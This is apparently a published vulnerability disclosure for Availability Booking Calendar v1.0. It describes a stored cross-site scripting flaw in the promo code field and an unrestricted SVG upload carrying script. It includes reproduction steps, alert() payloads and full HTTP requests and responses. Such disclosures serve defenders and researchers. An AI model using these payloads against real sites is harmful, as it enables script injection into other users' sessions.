# Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Tested on: Ubuntu 20.04
# Blog: http://msecureltd.blogspot.com
XSS #1:
Steps to Reproduce:
1. Browse to Bookings
2. Select All Bookings
3. Edit booking and select Promo Code
4. Enter payload TEST"><script>alert(`XSS`)</script>
// HTTP POST request
POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]
[...]
edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1
[...]
// HTTP response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 205
[...]
// HTTP GET request to Bookings page
GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]
// HTTP response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 33590
[...]
[...]
<label class="control-label" for="promo_code">Promo code:</label>
<input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder="">
</div>
[...]
Unrestricted File Upload #1:
// SVG file contents
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(`XSS`);
</script>
</svg>
Steps to Reproduce:
1. Browse My Account
2. Image Browse -> Upload
3. Then right click on image
4. Select Open Image in New Tab
// HTTP POST request
POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]
[...]
-----------------------------13831219578609189241212424546
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(`XSS`);
</script>
</svg>
[...]
// HTTP response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 190
[...]